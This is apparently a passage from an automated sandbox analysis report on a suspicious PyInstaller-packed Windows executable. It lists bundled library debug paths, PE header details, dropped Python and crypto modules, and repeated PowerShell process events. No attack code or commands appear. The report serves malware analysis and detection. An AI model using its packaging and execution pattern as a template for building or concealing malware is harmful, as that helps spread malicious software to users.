ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: MkWMm5piE5.exe, 00000002.00000002.2598515709.00007FFEDDD22000.00000002.00000001.01000000.00000012.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr
      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: MkWMm5piE5.exe, 00000002.00000002.2598515709.00007FFEDDD22000.00000002.00000001.01000000.00000012.sdmp
      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: MkWMm5piE5.exe, 00000002.00000002.2595739361.00007FFEDCA03000.00000002.00000001.01000000.0000001F.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: MkWMm5piE5.exe, 00000002.00000002.2603818292.00007FFEF5CE6000.00000002.00000001.01000000.00000014.sdmp
      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: MkWMm5piE5.exe, 00000000.00000003.1340184493.0000023382119000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2603711740.00007FFEEF563000.00000002.00000001.01000000.00000005.sdmp
      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-312\Release\win32api.pdb source: win32api.pyd.0.dr
      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: MkWMm5piE5.exe, 00000000.00000003.1340184493.0000023382119000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2603711740.00007FFEEF563000.00000002.00000001.01000000.00000005.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: MkWMm5piE5.exe, 00000002.00000002.2596229944.00007FFEDCCCC000.00000002.00000001.01000000.0000001B.sdmp
      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-312\Release\pywintypes.pdb** source: MkWMm5piE5.exe, 00000002.00000002.2596967122.00007FFEDD1C0000.00000002.00000001.01000000.0000001D.sdmp, pywintypes312.dll.0.dr
      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: MkWMm5piE5.exe, 00000002.00000002.2601513284.00007FFEEBAA5000.00000002.00000001.01000000.0000001E.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: MkWMm5piE5.exe, 00000002.00000002.2603253047.00007FFEECEC3000.00000002.00000001.01000000.0000000D.sdmp, select.pyd.0.dr
      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-312\Release\pywintypes.pdb source: MkWMm5piE5.exe, 00000002.00000002.2596967122.00007FFEDD1C0000.00000002.00000001.01000000.0000001D.sdmp, pywintypes312.dll.0.dr
      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-312\Release\win32api.pdb!! source: win32api.pyd.0.dr
      Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: MkWMm5piE5.exe, 00000002.00000002.2599427551.00007FFEE6F31000.00000002.00000001.01000000.00000007.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: MkWMm5piE5.exe, 00000002.00000002.2603436449.00007FFEEF2F7000.00000002.00000001.01000000.00000016.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: _decimal.pyd.0.dr
      Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: MkWMm5piE5.exe, 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmp
      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-312\Release\win32crypt.pdb source: MkWMm5piE5.exe, 00000002.00000002.2597055508.00007FFEDD1F1000.00000002.00000001.01000000.0000001C.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: MkWMm5piE5.exe, 00000002.00000002.2598927131.00007FFEDDEBC000.00000002.00000001.01000000.0000000A.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: MkWMm5piE5.exe, 00000002.00000002.2603608651.00007FFEEF458000.00000002.00000001.01000000.00000013.sdmp
      Source: Binary string: crypto\stack\stack.cOPENSSL_sk_dupOPENSSL_sk_deep_copysk_reserveOPENSSL_sk_new_reserveOPENSSL_sk_reserveOPENSSL_sk_insertOPENSSL_sk_seti=%dcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC3.1.4built on: Fri Nov 24 00:12:45 2023 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptoOPENSSL_atexitcrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: MkWMm5piE5.exe, 00000002.00000002.2595739361.00007FFEDCA03000.00000002.00000001.01000000.0000001F.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: MkWMm5piE5.exe, 00000002.00000002.2599213917.00007FFEDEC42000.00000002.00000001.01000000.00000015.sdmp
      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-312\Release\win32crypt.pdb!! source: MkWMm5piE5.exe, 00000002.00000002.2597055508.00007FFEDD1F1000.00000002.00000001.01000000.0000001C.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: MkWMm5piE5.exe, 00000002.00000002.2603162943.00007FFEEC0D3000.00000002.00000001.01000000.0000000E.sdmp
      Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-7t032bmh\src\rust\target\release\deps\cryptography_rust.pdbcQ source: MkWMm5piE5.exe, 00000002.00000002.2595739361.00007FFEDCA03000.00000002.00000001.01000000.0000001F.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: MkWMm5piE5.exe, 00000002.00000002.2598927131.00007FFEDDEBC000.00000002.00000001.01000000.0000000A.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: MkWMm5piE5.exe, 00000002.00000002.2599036751.00007FFEDDEDD000.00000002.00000001.01000000.00000009.sdmp
      Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-7t032bmh\src\rust\target\release\deps\cryptography_rust.pdb source: MkWMm5piE5.exe, 00000002.00000002.2595739361.00007FFEDCA03000.00000002.00000001.01000000.0000001F.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: MkWMm5piE5.exe, 00000002.00000002.2603342065.00007FFEED7A4000.00000002.00000001.01000000.0000000B.sdmp, _wmi.pyd.0.dr
      Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: MkWMm5piE5.exe, 00000002.00000002.2598835616.00007FFEDDE89000.00000002.00000001.01000000.0000000C.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: MkWMm5piE5.exe, 00000002.00000002.2599120809.00007FFEDEC0F000.00000002.00000001.01000000.0000001A.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: MkWMm5piE5.exe, 00000002.00000002.2603342065.00007FFEED7A4000.00000002.00000001.01000000.0000000B.sdmp, _wmi.pyd.0.dr
      Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: MkWMm5piE5.exe, 00000002.00000002.2591160543.000001E4C86D0000.00000002.00000001.01000000.00000006.sdmp
      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: MkWMm5piE5.exe, 00000002.00000002.2601513284.00007FFEEBAA5000.00000002.00000001.01000000.0000001E.sdmp
      Source: Binary string: D:\a\1\b\libssl-3.pdb source: MkWMm5piE5.exe, 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmp
      Source: Binary string: X509_SIGPKCS8_encrypt_excrypto\pkcs12\p12_p8e.cPKCS8_set0_pbe_excompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap source: MkWMm5piE5.exe, 00000002.00000002.2595739361.00007FFEDCA03000.00000002.00000001.01000000.0000001F.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: MkWMm5piE5.exe, 00000002.00000002.2599299859.00007FFEDEC6D000.00000002.00000001.01000000.00000010.sdmp
      Source: MkWMm5piE5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: MkWMm5piE5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: MkWMm5piE5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: MkWMm5piE5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: MkWMm5piE5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: VCRUNTIME140_1.dll.0.drStatic PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
      Source: MkWMm5piE5.exeStatic PE information: section name: _RDATA
      Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
      Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
      Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
      Source: libssl-3.dll.0.drStatic PE information: section name: .00cfg
      Source: python312.dll.0.drStatic PE information: section name: PyRuntim
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBE05004 push rsp; retf 0_2_00007FF7FBE05005
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE31D7B push rcx; retf 2_2_00007FFEDCE31D7C
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFE7C2E00BD pushad ; iretd 3_2_00007FFE7C2E00C1

      Persistence and Installation Behavior

      barindex
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeProcess created: "C:\Users\user\Desktop\MkWMm5piE5.exe"
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_Salsa20.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\_wmi.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_SHA512.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\win32\win32api.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\VCRUNTIME140.dllJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\libcrypto-3.dllJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Protocol\_scrypt.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_MD5.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_MD4.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\_sqlite3.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_chacha20.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_ghash_clmul.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_cbc.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_keccak.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\libffi-8.dllJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_ghash_portable.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\sqlite3.dllJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\pyexpat.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_cast.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_SHA256.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_ctr.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\_multiprocessing.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_des3.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_SHA384.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\libssl-3.dllJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\_hashlib.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_poly1305.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\select.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_MD2.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\_cffi_backend.cp312-win_amd64.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\_decimal.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_arc2.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\_ssl.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\PublicKey\_ec_ws.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Util\_strxor.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\_bz2.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\python312.dllJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\PublicKey\_x25519.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_des.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\pywin32_system32\pywintypes312.dllJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_SHA224.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\cryptography\hazmat\bindings\_rust.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\win32\win32crypt.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_cfb.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Util\_cpuid_c.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_aesni.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\_socket.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\PublicKey\_ed448.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\_ctypes.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_ecb.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_RIPEMD160.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\_queue.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\python3.dllJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\_overlapped.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\PublicKey\_ed25519.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_ARC4.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_ofb.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_BLAKE2b.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_BLAKE2s.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\VCRUNTIME140_1.dllJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\_lzma.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Math\_modexp.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_SHA1.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_aes.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\_asyncio.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\unicodedata.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_ocb.pydJump to dropped file
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDC51E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF7FBDC51E0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
